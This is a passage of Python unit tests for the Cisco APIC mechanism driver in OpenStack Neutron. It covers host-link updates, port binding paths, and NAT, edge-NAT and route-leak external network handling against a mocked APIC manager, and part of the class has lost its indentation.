    def test_rpc_endpoint_set(self):
        # The mechanism driver registers exactly one topology RPC endpoint
        # of the expected callback class.
        self.assertEqual(1, len(self.driver.topology_endpoints))
        rpc = self.driver.topology_endpoints[0]
        self.assertIsInstance(rpc, mech_rpc.ApicTopologyRpcCallbackMechanism)

    def test_peers_loaded(self):
        # Verify static configured hosts in rpc peers
        self._add_hosts_to_apic(2)
        peers = self.rpc._load_peers()
        self.assertIn(('h1', 'static'), peers)
        self.assertIn(('h2', 'static'), peers)

    def test_remove_hostlink(self):
        """Removing a host link deletes the static paths bound on it only."""
        self._register_agent('h1')
        self._register_agent('h2')
        # Test removal of one link
        self._add_hosts_to_apic(3)
        self.driver.apic_manager.delete_path = mock.Mock()
        net = self.create_network()['network']
        sub = self.create_subnet(
            network_id=net['id'], cidr='192.168.0.0/24',
            ip_version=4)
        # Create two ports
        with self.port(subnet=sub) as p1:
            with self.port(subnet=sub) as p2:
                self._bind_port_to_host(p1['port']['id'], 'h1')
                self._bind_port_to_host(p2['port']['id'], 'h2')
                # Remove H1 interface from ACI
                self.rpc.update_link(mock.Mock(), 'h1', 'static', None, 0, '1',
                                     '1')
                # Assert H1 on net vlan static paths deleted
                (self.driver.apic_manager.delete_path.
                 assert_called_once_with(self._tenant_id, net['id'], '1',
                                         '1', '1'))
                self.driver.apic_manager.delete_path.reset_mock()
                # Unbound
                self.rpc.update_link(mock.Mock(), 'h3', 'static', None, 0, '1',
                                     '3')
                self.assertEqual(
                    0, self.driver.apic_manager.delete_path.call_count)

    def test_remove_hostlink_vpc(self):
        """With a VPC pair, paths survive until the last member link dies."""
        self._register_agent('h1')
        self._add_hosts_to_apic(3, vpc=True)
        self.driver.apic_manager.delete_path = mock.Mock()
        net = self.create_network()['network']
        sub = self.create_subnet(
            network_id=net['id'], cidr='192.168.0.0/24',
            ip_version=4)
        # Create two ports
        with self.port(subnet=sub) as p1:
            self._bind_port_to_host(p1['port']['id'], 'h1')
            # Remove H1 interface from ACI
            self.rpc.update_link(mock.Mock(), 'h1', 'eth0', None, 0, '1',
                                 '1')
            # Another link still exists
            self.assertEqual(
                0, self.driver.apic_manager.delete_path.call_count)
            self.driver.apic_manager.delete_path.reset_mock()
            self.rpc.update_link(mock.Mock(), 'h1', 'eth1', None, 0, '2',
                                 '1')
            (self.driver.apic_manager.delete_path.
             assert_called_once_with(self._tenant_id, net['id'], '2', '1',
                                     '1'))

    def test_add_hostlink(self):
        """A new host link re-creates paths only for ports bound there."""
        self._register_agent('h1')
        self._register_agent('h2')
        self._register_agent('rhel03')
        # Test removal of one link
        self._add_hosts_to_apic(2)
        net = self.create_network()['network']
        sub = self.create_subnet(
            network_id=net['id'], cidr='192.168.0.0/24',
            ip_version=4)
        # Create two ports
        with self.port(subnet=sub) as p1:
            with self.port(subnet=sub) as p2:
                with self.port(subnet=sub) as p3:
                    self._bind_port_to_host(p1['port']['id'], 'h1')
                    self._bind_port_to_host(p2['port']['id'], 'h2')
                    self._bind_port_to_host(p3['port']['id'], 'rhel03')
                    self.driver.apic_manager.ensure_path_created_for_port = (
                        mock.Mock())
                    # Add H3 interface from ACI
                    self.rpc.update_link(
                        mock.Mock(), 'h3', 'static', None, '3', '1', '3')
                    # No path created since no port is bound on H3
                    self.assertEqual(
                        0,
                        self.driver.apic_manager.ensure_path_created_for_port.
                        call_count)
                    (self.driver.apic_manager.ensure_path_created_for_port.
                     reset_mock())
                    # Add H4 interface from ACI
                    self.rpc.update_link(
                        mock.Mock(), 'rhel03', 'static', None, '4', '1', '4')
                    # P3 was bound in H4
                    net = self.show_network(net['id'],
                                            is_admin_context=True)['network']
                    (self.driver.apic_manager.ensure_path_created_for_port.
                     assert_called_once_with(
                         self._tenant_id, net['id'], 'rhel03',
                         net['provider:segmentation_id']))

    def test_update_hostlink(self):
        """Changing a host's interface deletes and re-creates its paths."""
        self._register_agent('h1')
        self._add_hosts_to_apic(1)
        net1 = self.create_network()['network']
        sub1 = self.create_subnet(
            network_id=net1['id'], cidr='192.168.0.0/24',
            ip_version=4)
        net2 = self.create_network()['network']
        sub2 = self.create_subnet(
            network_id=net2['id'], cidr='192.168.1.0/24',
            ip_version=4)
        # Create two ports
        with self.port(subnet=sub1) as p1:
            with self.port(subnet=sub1) as p2:
                with self.port(subnet=sub2) as p3:
                    # Bind all on H1
                    self._bind_port_to_host(p1['port']['id'], 'h1')
                    self._bind_port_to_host(p2['port']['id'], 'h1')
                    self._bind_port_to_host(p3['port']['id'], 'h1')
                    mgr = self.driver.apic_manager
                    mgr.delete_path = mock.Mock()
                    mgr.ensure_path_created_for_port = mock.Mock()
                    # Change host interface
                    self.rpc.update_link(
                        mock.Mock(), 'h1', 'static', None, '1', '1', '24')
                    # Ports' path have been deleted and reissued two times (one
                    # for network)
                    expected_calls_remove = [
                        mock.call(self._tenant_id, net1['id'], '1', '1', '1'),
                        mock.call(self._tenant_id, net2['id'], '1', '1', '1')]
                    # Create path expected calls
                    net1 = self.show_network(
                        net1['id'], is_admin_context=True)['network']
                    net2 = self.show_network(
                        net2['id'], is_admin_context=True)['network']
                    expected_calls_add = [
                        mock.call(self._tenant_id, net1['id'], 'h1',
                                  net1['provider:segmentation_id']),
                        mock.call(self._tenant_id, net2['id'], 'h1',
                                  net2['provider:segmentation_id'])]
                    self._check_call_list(
                        expected_calls_remove,
                        mgr.delete_path.call_args_list)
                    self._check_call_list(
                        expected_calls_add,
                        mgr.ensure_path_created_for_port.call_args_list)

    def test_duplicate_hostlink(self):
        """Reporting an already-known host link must not raise."""
        self.driver.apic_manager.add_hostlink(
            'h1', 'static', None, '1', '1', '1')
        # The below doesn't rise
        self.rpc.update_link(
            mock.Mock(), 'h1', 'static', None, '1', '1', '1')
class TestCiscoApicMechDriver(testlib_api.SqlTestCase,
mocked.ControllerMixin,
mocked.ConfigMixin):
def setUp(self):
    """Build a fully mocked APICMechanismDriver for unit tests.

    The APIC manager, l3 plugin and name mapper are all Mocks; the name
    mapper is wired to identity functions (``echo``) so that assertions
    can be written against plain Neutron names.
    """
    super(TestCiscoApicMechDriver, self).setUp()
    mocked.ControllerMixin.set_up_mocks(self)
    mocked.ConfigMixin.set_up_mocks(self)
    self.mock_apic_manager_login_responses()
    self.driver = md.APICMechanismDriver()
    self.driver.synchronizer = None
    self.synchronizer = mock.Mock()
    md.APICMechanismDriver.get_base_synchronizer = mock.Mock(
        return_value=self.synchronizer)
    apic_mapper.ApicName.__eq__ = equal
    self.driver.apic_manager = mock.Mock(
        name_mapper=mock.Mock(), ext_net_dict=self.external_network_dict)
    self.driver.initialize()
    self.driver.vif_type = 'test-vif_type'
    self.driver.cap_port_filter = 'test-cap_port_filter'
    # Identity mapping: APIC names == Neutron names in assertions.
    self.driver.name_mapper.aci_mapper.tenant = echo
    self.driver.name_mapper.aci_mapper.network = echo
    self.driver.name_mapper.aci_mapper.subnet = echo
    self.driver.name_mapper.aci_mapper.port = echo
    self.driver.name_mapper.aci_mapper.router = echo
    self.driver.name_mapper.aci_mapper.pre_existing = echo
    self.driver.name_mapper.aci_mapper.echo = echo
    self.driver.name_mapper.aci_mapper.app_profile.return_value = (
        mocked.APIC_AP)
    self.driver.name_mapper.aci_mapper.get_tenant_name.return_value = (
        mocked.APIC_TENANT)
    self.driver.name_mapper.aci_mapper.update_tenant_name.return_value = (
        'new_name')
    self.driver.apic_manager.apic.transaction = self.fake_transaction
    self.agent = {'configurations': {
        'opflex_networks': None,
        'bridge_mappings': {'physnet1': 'br-eth1'}}}
    mock.patch('neutron.manager.NeutronManager').start()
    self.driver._l3_plugin = mock.Mock()
    # SNAT helpers pass their input through untouched for these tests.
    self.driver._allocate_snat_ip = echo
    self.driver._create_snat_ip_allocation_subnet = echo
    self.driver._delete_snat_ip_allocation_network = echo

    def get_resource(context, resource_id):
        # Minimal l3-plugin stand-in: echo the id under the mocked tenant.
        return {'id': resource_id, 'tenant_id': mocked.APIC_TENANT}
    self.driver._l3_plugin.get_router = get_resource
    self.driver._l3_plugin.get_routers = mock.Mock(return_value=[
        {'id': mocked.APIC_ROUTER, 'tenant_id': mocked.APIC_TENANT}])
    # Template l3extOut body used by the pre-existing edge-NAT tests; the
    # 'Sub' placeholders are substituted before being posted to APIC.
    self.trimmed_l3out = u'{"l3extOut": {"attributes": {"rn": "Auto-Sub\
"}, "children": [ {"l3extRsNdIfPol": {"tnNdIfPolName": ""}}, \
{"l3extRsDampeningPol": {"tnRtctrlProfileName": ""}}, {"ospfRsIfPol": \
{"tnOspfIfPolName": ""}}, {"l3extRsEngressQosDppPol": {"tnQosDppPolName": ""}}\
, {"bfdRsIfPol": {"tnBfdIfPolName": ""}}, {"bgpRsPeerPfxPol": \
{"tnBgpPeerPfxPolName": ""}}, {"eigrpRsIfPol": {"tnEigrpIfPolName": ""}}, \
{"l3extLNodeP": {"attributes": {"dn": "uni/tn-Sub/out-Auto-Sub/\
lnodep-Leaf3-4_NP"}, "children": [{"l3extLIfP": {"children": [{"\
l3extRsPathL3OutAtt": {"attributes": {"ifInstT": "sub-interface", "encap": \
"vlan-999"}}}]}}]}}, {"l3extRsEctx": {"attributes": {"dn": "uni/tn-Sub\
/out-Auto-Sub/rsectx", "tnFvCtxName": "ctx-Sub"}}}]}}'
    self.driver._query_external_EPG = mock.Mock()
    self.driver._query_external_EPG.return_value = ['5.5.5.0/24',
                                                    '6.6.6.0/24']
def _check_call_list(self, expected, observed):
    """Assert ``observed`` contains exactly the calls in ``expected``.

    Order-independent comparison that honors multiplicity: each expected
    call consumes one matching occurrence, so duplicates must appear the
    same number of times in both lists.

    :param expected: list of mock.call objects that must all be present.
    :param observed: list of calls actually made (e.g. a Mock's
        call_args_list). Left unmodified.
    :raises AssertionError: if a call is missing or extra calls remain.
    """
    # Work on a copy so the caller's list -- typically a Mock's
    # call_args_list -- is not destructively emptied by this check.
    remaining = observed[:]
    for call in expected:
        self.assertIn(
            call, remaining,
            msg='Call not found, expected:\n%s\nobserved:'
                '\n%s' % (str(expected), str(observed)))
        remaining.remove(call)
    self.assertEqual(
        0, len(remaining),
        msg='There are more calls than expected: %s' % str(remaining))
def test_initialize(self):
    """Driver initialization provisions infra and BGP pod policy once."""
    apic = self.driver.apic_manager
    for setup_mock in (apic.ensure_infra_created_on_apic,
                       apic.ensure_bgp_pod_policy_created_on_apic):
        self.assertEqual(1, setup_mock.call_count)
def test_update_port_postcommit(self):
    """Updating a bound port programs exactly one APIC static path."""
    network_ctx = self._get_network_context(
        mocked.APIC_TENANT, mocked.APIC_NETWORK, TEST_SEGMENT1)
    context = self._get_port_context(
        mocked.APIC_TENANT, mocked.APIC_NETWORK, 'vm1', network_ctx,
        HOST_ID1, device_owner='any')
    self.driver.update_port_postcommit(context)
    apic = self.driver.apic_manager
    apic.ensure_path_created_for_port.assert_called_once_with(
        self._tenant(), mocked.APIC_NETWORK, HOST_ID1, ENCAP,
        transaction='transaction', bd_name=None,
        app_profile_name=self._app_profile())
def test_update_host(self):
    """Port update after a host move completes without raising."""
    network_ctx = self._get_network_context(
        mocked.APIC_TENANT, mocked.APIC_NETWORK, TEST_SEGMENT1)
    context = self._get_port_context(
        mocked.APIC_TENANT, mocked.APIC_NETWORK, 'vm1', network_ctx,
        HOST_ID1, device_owner='any')
    # Simulate a migration: the port was previously bound to another host.
    context.original_host = HOST_ID2
    self.driver.update_port_postcommit(context)
def test_create_port_postcommit(self):
    """Creating a port on an opflex segment programs no static path."""
    network_ctx = self._get_network_context(
        mocked.APIC_TENANT, mocked.APIC_NETWORK, TEST_SEGMENT1,
        seg_type=ofcst.TYPE_OPFLEX)
    context = self._get_port_context(
        mocked.APIC_TENANT, mocked.APIC_NETWORK, 'vm1', network_ctx,
        HOST_ID1, device_owner='any')
    apic = self.driver.apic_manager
    self.assertTrue(self.driver._check_segment_for_agent(
        context._bound_segment, self.agent))
    self.driver.create_port_postcommit(context)
    apic.ensure_path_created_for_port.assert_not_called()
def test_update_port_precommit_empty_tenant_1(self):
    """Precommit on a gateway port skips NAT checks for a tenant-less
    router."""
    self.driver._is_nat_enabled_on_ext_net = mock.Mock()
    self.driver._l3_plugin.get_router = mock.Mock(
        return_value={'id': mocked.APIC_ROUTER, 'tenant_id': ''})
    network_ctx = self._get_network_context(
        mocked.APIC_TENANT, mocked.APIC_NETWORK, TEST_SEGMENT1,
        seg_type=ofcst.TYPE_OPFLEX, external=True)
    context = self._get_port_context(
        mocked.APIC_TENANT, mocked.APIC_NETWORK, mocked.APIC_ROUTER,
        network_ctx, HOST_ID1,
        device_owner=n_constants.DEVICE_OWNER_ROUTER_GW)
    self.assertTrue(self.driver._check_segment_for_agent(
        context._bound_segment, self.agent))
    self.driver.update_port_precommit(context)
    self.driver._is_nat_enabled_on_ext_net.assert_not_called()
def test_update_port_precommit_empty_tenant_2(self):
    """Precommit falls back to a router lookup when the network's router
    tenant is empty, and checks whether the l3out is pre-existing."""
    self.driver._is_nat_enabled_on_ext_net = mock.Mock(return_value=False)
    self.driver.per_tenant_context = True
    self.driver._is_edge_nat = mock.Mock(return_value=False)
    self.driver._is_pre_existing = mock.Mock(return_value=False)
    # get_router returns a real tenant, but the router list for the
    # network yields an empty tenant_id, forcing the fallback path.
    self.driver._l3_plugin.get_router = mock.Mock(
        return_value={'id': mocked.APIC_ROUTER, 'tenant_id': 'foo'})
    self.driver._l3_plugin.get_routers = mock.Mock(
        return_value=[{'id': mocked.APIC_ROUTER, 'tenant_id': ''}])
    net_ctx = self._get_network_context(mocked.APIC_TENANT,
                                        mocked.APIC_NETWORK,
                                        TEST_SEGMENT1,
                                        seg_type=ofcst.TYPE_OPFLEX,
                                        external=True)
    r_cnst = n_constants.DEVICE_OWNER_ROUTER_GW
    port_ctx = self._get_port_context(mocked.APIC_TENANT,
                                      mocked.APIC_NETWORK,
                                      mocked.APIC_ROUTER,
                                      net_ctx, HOST_ID1,
                                      device_owner=r_cnst)
    self.assertTrue(self.driver._check_segment_for_agent(
        port_ctx._bound_segment, self.agent))
    self.driver.update_port_precommit(port_ctx)
    self.driver._l3_plugin.get_routers.assert_called_once_with(
        mock.ANY, filters=mock.ANY)
    self.driver._is_pre_existing.assert_called_once_with(mock.ANY)
def test_create_port_postcommit_empty_tenant(self):
    """No shadow external network is built for a tenant-less router."""
    self.driver._create_shadow_ext_net_for_nat = mock.Mock()
    self.driver._is_nat_enabled_on_ext_net = mock.Mock(return_value=True)
    self.driver._l3_plugin.get_router = mock.Mock(
        return_value={'id': mocked.APIC_ROUTER, 'tenant_id': ''})
    network_ctx = self._get_network_context(
        mocked.APIC_TENANT, mocked.APIC_NETWORK, TEST_SEGMENT1,
        seg_type=ofcst.TYPE_OPFLEX)
    context = self._get_port_context(
        mocked.APIC_TENANT, mocked.APIC_NETWORK, mocked.APIC_ROUTER,
        network_ctx, HOST_ID1,
        device_owner=n_constants.DEVICE_OWNER_ROUTER_GW)
    self.assertTrue(self.driver._check_segment_for_agent(
        context._bound_segment, self.agent))
    self.driver.create_port_postcommit(context)
    self.driver._create_shadow_ext_net_for_nat.assert_not_called()
def test_create_port_postcommit_opflex(self):
    """An 'opflex' segment never gets an APIC static path on create."""
    network_ctx = self._get_network_context(
        mocked.APIC_TENANT, mocked.APIC_NETWORK, TEST_SEGMENT1,
        seg_type='opflex')
    context = self._get_port_context(
        mocked.APIC_TENANT, mocked.APIC_NETWORK, 'vm1', network_ctx,
        HOST_ID1, device_owner='any')
    self.assertTrue(self.driver._check_segment_for_agent(
        context._bound_segment, self.agent))
    apic = self.driver.apic_manager
    self.driver.create_port_postcommit(context)
    self.assertEqual(0, apic.ensure_path_created_for_port.call_count)
def test_create_port_cross_tenant(self):
    """A port from another tenant is pathed under the network's tenant."""
    network_ctx = self._get_network_context(
        mocked.APIC_TENANT, mocked.APIC_NETWORK, TEST_SEGMENT1)
    context = self._get_port_context(
        'some-admin', mocked.APIC_NETWORK, 'vm1', network_ctx,
        HOST_ID1, device_owner='any')
    apic = self.driver.apic_manager
    self.driver.create_port_postcommit(context)
    self.assertEqual('some-admin', context.current['tenant_id'])
    # Path creation gets called with the network tenant id
    apic.ensure_path_created_for_port.assert_called_once_with(
        self._tenant(), mocked.APIC_NETWORK, HOST_ID1, ENCAP,
        transaction='transaction', bd_name=None,
        app_profile_name=self._app_profile())
def test_update_port_nobound_postcommit(self):
    """Updating an unbound port must not touch APIC paths."""
    network_ctx = self._get_network_context(
        mocked.APIC_TENANT, mocked.APIC_NETWORK, TEST_SEGMENT1)
    context = self._get_port_context(
        mocked.APIC_TENANT, mocked.APIC_NETWORK, 'vm1', network_ctx,
        None, device_owner='any')
    self.driver.update_port_postcommit(context)
    apic = self.driver.apic_manager
    self.assertEqual(0, apic.ensure_path_created_for_port.call_count)
def test_create_port_nobound_postcommit(self):
    """Creating an unbound port must not touch APIC paths."""
    network_ctx = self._get_network_context(
        mocked.APIC_TENANT, mocked.APIC_NETWORK, TEST_SEGMENT1)
    context = self._get_port_context(
        mocked.APIC_TENANT, mocked.APIC_NETWORK, 'vm1', network_ctx,
        None, device_owner='any')
    self.driver.create_port_postcommit(context)
    apic = self.driver.apic_manager
    self.assertEqual(0, apic.ensure_path_created_for_port.call_count)
def _test_update_gw_port_postcommit(self, net_tenant=mocked.APIC_TENANT):
    """Gateway-port update on a NAT-enabled external network.

    Expects a shadow ("Shd-") external routed network per router context,
    with its external EPGs created from the queried subnets and wired to
    consume and provide the router contract.

    :param net_tenant: tenant owning the external network; pass a
        different tenant to exercise the cross-tenant path.
    """
    net_ctx = self._get_network_context(net_tenant,
                                        mocked.APIC_NETWORK,
                                        TEST_SEGMENT1, external=True)
    port_ctx = self._get_port_context(mocked.APIC_TENANT,
                                      mocked.APIC_NETWORK,
                                      'vm1', net_ctx, HOST_ID1, gw=True)
    mgr = self.driver.apic_manager
    mgr.get_router_contract.return_value = mocked.FakeDbContract(
        mocked.APIC_CONTRACT)
    self.driver.update_port_postcommit(port_ctx)
    mgr.get_router_contract.assert_called_once_with(
        self._scoped_name(port_ctx.current['device_id']),
        owner=self._router_tenant())
    # Shadow l3out name depends on per-tenant-context and per-router-VRF
    # configuration of the driver subclass under test.
    vrf_pfx = ('%s-' % mocked.APIC_ROUTER
               if self.driver.vrf_per_router_tenants else '')
    shd_l3out = (self.driver.per_tenant_context and
                 self._scoped_name(vrf_pfx + mocked.APIC_NETWORK) or
                 mocked.APIC_NETWORK)
    expected_calls = [
        mock.call("Shd-%s" % shd_l3out,
                  owner=self._tenant(ext_nat=True), transaction=mock.ANY,
                  context=self._routed_network_vrf_name())]
    self._check_call_list(
        expected_calls,
        mgr.ensure_external_routed_network_created.call_args_list)
    # One shadow external EPG per subnet returned by _query_external_EPG
    # (mocked in setUp to 5.5.5.0/24 and 6.6.6.0/24).
    expected_calls = [
        mock.call("Shd-%s" % shd_l3out, subnet='5.5.5.0/24',
                  external_epg="Shd-%s" % mocked.APIC_EXT_EPG,
                  owner=self._tenant(ext_nat=True), transaction=mock.ANY),
        mock.call("Shd-%s" % shd_l3out, subnet='6.6.6.0/24',
                  external_epg="Shd-%s" % mocked.APIC_EXT_EPG,
                  owner=self._tenant(ext_nat=True), transaction=mock.ANY)]
    self._check_call_list(
        expected_calls, mgr.ensure_external_epg_created.call_args_list)
    expected_calls = [
        mock.call(
            "Shd-%s" % shd_l3out,
            mgr.get_router_contract.return_value,
            external_epg="Shd-%s" % mocked.APIC_EXT_EPG,
            owner=self._tenant(ext_nat=True), transaction=mock.ANY)]
    self._check_call_list(
        expected_calls,
        mgr.ensure_external_epg_consumed_contract.call_args_list)
    expected_calls = [
        mock.call(
            "Shd-%s" % shd_l3out,
            mgr.get_router_contract.return_value,
            external_epg="Shd-%s" % mocked.APIC_EXT_EPG,
            owner=self._tenant(ext_nat=True), transaction=mock.ANY)]
    self._check_call_list(
        expected_calls,
        mgr.ensure_external_epg_provided_contract.call_args_list)
def test_update_gw_port_postcommit(self):
    """NAT gateway-port update, external net in the default tenant."""
    self._test_update_gw_port_postcommit()

def test_update_cross_tenant_gw_port_postcommit(self):
    """NAT gateway-port update, external net owned by another tenant."""
    self._test_update_gw_port_postcommit('admin_tenant')
def _test_update_edge_nat_gw_port_postcommit(
        self, net_tenant=mocked.APIC_TENANT):
    """Gateway-port update on an edge-NAT external network.

    Edge NAT creates an "Auto-" l3out (instead of the "Shd-" shadow),
    reserves an encap VLAN, programs node profile/static route/domain,
    and links the tenant BD to the new l3out.

    :param net_tenant: tenant owning the external network; pass a
        different tenant to exercise the cross-tenant path.
    """
    net_ctx = self._get_network_context(net_tenant,
                                        mocked.APIC_NETWORK_EDGE_NAT,
                                        TEST_SEGMENT1, external=True)
    port_ctx = self._get_port_context(mocked.APIC_TENANT,
                                      mocked.APIC_NETWORK_EDGE_NAT,
                                      'vm1', net_ctx, HOST_ID1, gw=True)
    mgr = self.driver.apic_manager
    mgr.get_router_contract.return_value = mocked.FakeDbContract(
        mocked.APIC_CONTRACT)
    self.driver.l3out_vlan_alloc.reserve_vlan = mock.Mock()
    manager.NeutronManager = mock.MagicMock()
    manager.NeutronManager.get_plugin().get_networks.return_value = [
        {'tenant_id': mocked.APIC_TENANT,
         'name': mocked.APIC_NETWORK,
         'id': u'net_id'}]
    self.driver.update_port_postcommit(port_ctx)
    mgr.get_router_contract.assert_called_once_with(
        self._scoped_name(port_ctx.current['device_id']),
        owner=self._router_tenant())
    # "Auto-" l3out name depends on per-tenant-context / per-router-VRF
    # configuration of the driver subclass under test.
    vrf_pfx = ('%s-' % mocked.APIC_ROUTER
               if self.driver.vrf_per_router_tenants else '')
    l3out_name = (self.driver.per_tenant_context and
                  self._scoped_name(vrf_pfx + mocked.APIC_NETWORK_EDGE_NAT)
                  or mocked.APIC_NETWORK_EDGE_NAT)
    l3out_name = "Auto-%s" % l3out_name
    expected_calls = [
        mock.call(l3out_name,
                  owner=self._tenant(ext_nat=True), transaction=mock.ANY,
                  context=self._routed_network_vrf_name())]
    self._check_call_list(
        expected_calls,
        mgr.ensure_external_routed_network_created.call_args_list)
    expected_calls = [
        mock.call(l3out_name, subnet='5.5.5.0/24',
                  external_epg="Auto-%s" % mocked.APIC_EXT_EPG,
                  owner=self._tenant(ext_nat=True), transaction=mock.ANY),
        mock.call(l3out_name, subnet='6.6.6.0/24',
                  external_epg="Auto-%s" % mocked.APIC_EXT_EPG,
                  owner=self._tenant(ext_nat=True), transaction=mock.ANY)]
    self._check_call_list(
        expected_calls, mgr.ensure_external_epg_created.call_args_list)
    self.driver.l3out_vlan_alloc.reserve_vlan.assert_called_once_with(
        mocked.APIC_NETWORK_EDGE_NAT + '-name',
        self._routed_network_vrf_name(),
        self._tenant(ext_nat=True))
    self.assertTrue(mgr.set_domain_for_external_routed_network.called)
    self.assertTrue(mgr.ensure_logical_node_profile_created.called)
    self.assertTrue(mgr.ensure_static_route_created.called)
    bd_name = self._scoped_name('net_id')
    mgr.set_l3out_for_bd.assert_called_once_with(
        self._tenant(), bd_name, l3out_name, transaction=mock.ANY)
    expected_calls = [
        mock.call(
            l3out_name,
            mgr.get_router_contract.return_value,
            external_epg="Auto-%s" % mocked.APIC_EXT_EPG,
            owner=self._tenant(ext_nat=True), transaction=mock.ANY)]
    self._check_call_list(
        expected_calls,
        mgr.ensure_external_epg_consumed_contract.call_args_list)
    expected_calls = [
        mock.call(
            l3out_name,
            mgr.get_router_contract.return_value,
            external_epg="Auto-%s" % mocked.APIC_EXT_EPG,
            owner=self._tenant(ext_nat=True), transaction=mock.ANY)]
    self._check_call_list(
        expected_calls,
        mgr.ensure_external_epg_provided_contract.call_args_list)
def test_update_edge_nat_gw_port_postcommit(self):
    """Edge-NAT gateway-port update, external net in the default tenant."""
    self._test_update_edge_nat_gw_port_postcommit()

def test_update_cross_tenant_edge_nat_gw_port_postcommit(self):
    """Edge-NAT gateway-port update, external net in another tenant."""
    self._test_update_edge_nat_gw_port_postcommit('admin_tenant')
def _test_update_interface_port_postcommit(self, no_nat=False, pre=False,
                                           net_tenant=None,
                                           route_leak=False):
    """Router-interface port update against edge-NAT / no-NAT externals.

    Parametrized helper covering four axes:

    :param no_nat: use the no-NAT external network instead of edge-NAT.
    :param pre: mark the (no-NAT) external network as pre-existing on
        APIC, mocking the l3out query result.
    :param net_tenant: tenant for the internal networks/port (defaults
        to the mocked APIC tenant); set to exercise cross-tenant cases.
    :param route_leak: router uses 'apic:use_routing_context', which
        should trigger the Leak-* BD/EPG/l3out plumbing (only asserted
        when the driver runs with per-router VRFs).
    """
    net_tenant = net_tenant or mocked.APIC_TENANT
    if self.driver.vrf_per_router_tenants:
        self.driver.vrf_per_router_tenants.append(net_tenant)
    if no_nat:
        ext_net = mocked.APIC_NETWORK_NO_NAT
        if pre:
            self.external_network_dict[ext_net + '-name'][
                'preexisting'] = 'True'
            self.driver._query_l3out_info = mock.Mock()
            self.driver._query_l3out_info.return_value = {
                'l3out_tenant': self._tenant(),
                'vrf_name': self._network_vrf_name(),
                'vrf_tenant': self._tenant(vrf=True)}
    else:
        ext_net = mocked.APIC_NETWORK_EDGE_NAT
    net_ctx = self._get_network_context(net_tenant,
                                        'net_id',
                                        TEST_SEGMENT1,
                                        route_leak=route_leak)
    net_ctx1 = self._get_network_context(net_tenant,
                                         'net_id1',
                                         TEST_SEGMENT1,
                                         route_leak=route_leak)
    port_ctx = self._get_port_context(net_tenant,
                                      'net_id',
                                      'vm1', net_ctx, HOST_ID1,
                                      interface=True)
    if route_leak:
        # Router explicitly borrows another router's routing context.
        self.driver._l3_plugin.get_router = mock.Mock(
            return_value={'id': 'some_id',
                          'name': mocked.APIC_ROUTER + '-name',
                          'tenant_id': net_tenant,
                          'apic:use_routing_context': mocked.APIC_ROUTER,
                          'external_gateway_info':
                          {'network_id': ext_net,
                           'external_fixed_ips': []}})
    else:
        self.driver._l3_plugin.get_router = mock.Mock(
            return_value={'id': mocked.APIC_ROUTER,
                          'name': mocked.APIC_ROUTER + '-name',
                          'tenant_id': net_tenant,
                          'external_gateway_info':
                          {'network_id': ext_net,
                           'external_fixed_ips': []}})
    port_ctx._plugin.get_network = mock.Mock(
        return_value={'name': ext_net + '-name',
                      'tenant_id': mocked.APIC_TENANT,
                      'router:external': True})
    self.driver._get_route_leak_networks = mock.Mock(
        return_value=([net_ctx.current, net_ctx1.current]))
    port_ctx._plugin.get_subnets = mock.Mock(
        return_value=[{'tenant_id': mocked.APIC_TENANT,
                       'id': 'some_id',
                       'cidr': '5.5.5.0/24'}])
    if route_leak:
        self.driver._get_subnet_info = mock.Mock(
            return_value=(mocked.APIC_TENANT, ext_net + '-name',
                          '3.3.3.1/24'))
        # Two subnets so both leak external EPG calls can be verified.
        port_ctx._plugin.get_subnets = mock.Mock(
            return_value=[{'tenant_id': mocked.APIC_TENANT,
                           'id': 'some_id',
                           'cidr': '5.5.5.0/24'},
                          {'tenant_id': mocked.APIC_TENANT,
                           'id': 'some_id1',
                           'cidr': '6.6.6.0/24'}])
    self.driver.update_port_postcommit(port_ctx)
    prefix = ('%s-' % mocked.APIC_ROUTER
              if self.driver.vrf_per_router_tenants and not no_nat else '')
    l3out_name = (self.driver.per_tenant_context and
                  self._scoped_name(prefix + ext_net) or ext_net)
    if not no_nat:
        l3out_name = "Auto-%s" % l3out_name
    elif pre:
        l3out_name = self._scoped_name(ext_net + '-name', preexisting=True)
    bd_tenant = self._tenant(neutron_tenant=net_tenant)
    bd_name = self._scoped_name('net_id', tenant=net_tenant)
    mgr = self.driver.apic_manager
    if self.driver.vrf_per_router_tenants:
        # Leak-* names only exist for per-router-VRF driver variants.
        leak_l3out = 'Leak-%s' % net_ctx.current['name']
        leak_l3out1 = 'Leak-%s' % net_ctx1.current['name']
        leak_ext_epg = 'Leak-%s-%s' % (mocked.APIC_ROUTER + '-name',
                                       mocked.APIC_EXT_EPG)
        if route_leak:
            # Route leak builds a dedicated Leak BD/EPG pair wired to
            # the router contract and the leak external EPGs.
            leak_bd_name = 'Leak-%s-%s' % (mocked.APIC_ROUTER, bd_name)
            mgr.ensure_bd_created_on_apic.assert_called_once_with(
                bd_tenant, leak_bd_name, ctx_owner=bd_tenant,
                ctx_name=self._routed_network_vrf_name(tenant=net_tenant),
                transaction=mock.ANY)
            leak_epg_name = 'Leak-%s-%s' % (mocked.APIC_ROUTER, 'net_id')
            mgr.ensure_epg_created.assert_called_once_with(
                bd_tenant, leak_epg_name, bd_name=leak_bd_name,
                app_profile_name=self._app_profile(),
                transaction=mock.ANY)
            mgr.ensure_subnet_created_on_apic.assert_called_once_with(
                bd_tenant, leak_bd_name, '3.3.3.1/24',
                scope=None, transaction=mock.ANY)
            contract_name = 'contract-%s' % mocked.APIC_ROUTER
            expected_calls = [
                mock.call(
                    bd_tenant, leak_epg_name, contract_name,
                    app_profile_name=self._app_profile(),
                    transaction=mock.ANY),
                mock.call(
                    bd_tenant, leak_epg_name, contract_name,
                    app_profile_name=self._app_profile(), provider=True,
                    transaction=mock.ANY)]
            self._check_call_list(
                expected_calls, mgr.set_contract_for_epg.call_args_list)
            expected_calls = [
                mock.call(leak_l3out, subnet='5.5.5.0/24',
                          external_epg=leak_ext_epg,
                          owner=bd_tenant, transaction=mock.ANY),
                mock.call(leak_l3out, subnet='6.6.6.0/24',
                          external_epg=leak_ext_epg,
                          owner=bd_tenant, transaction=mock.ANY)]
            self._check_call_list(
                expected_calls,
                mgr.ensure_external_epg_created.call_args_list)
            (mgr.ensure_external_epg_consumed_contract.
             assert_called_once_with(
                 leak_l3out, contract_name,
                 external_epg=leak_ext_epg,
                 owner=bd_tenant, transaction=mock.ANY))
            (mgr.ensure_external_epg_provided_contract.
             assert_called_once_with(
                 leak_l3out, contract_name,
                 external_epg=leak_ext_epg,
                 owner=bd_tenant, transaction=mock.ANY))
